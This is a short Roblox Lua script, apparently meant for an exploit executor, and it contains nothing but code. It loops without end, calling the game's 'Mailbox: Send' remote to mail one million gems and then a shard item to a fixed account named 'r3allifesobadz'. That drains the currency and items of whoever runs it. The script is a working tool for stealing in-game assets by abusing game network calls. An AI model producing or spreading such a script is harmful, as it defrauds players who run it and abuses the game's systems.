while task.wait() do
local args = {
    [1] = "r3allifesobadz",
    [2] = "gem",
    [3] = "Currency",
    [4] = "8f7dfe2f6a1f42b8853c89bd0cbedc6f",
    [5] = 1000000
}

game:GetService("ReplicatedStorage").Network:FindFirstChild("Mailbox: Send"):InvokeServer(unpack(args))
task.wait(3)
local args = {
    [1] = "r3allifesobadz",
    [2] = "shard",
    [3] = "Misc",
    [4] = "512fed79df52484387709fef0519d926",
    [5] = 1
}

game:GetService("ReplicatedStorage").Network:FindFirstChild("Mailbox: Send"):InvokeServer(unpack(args))
end
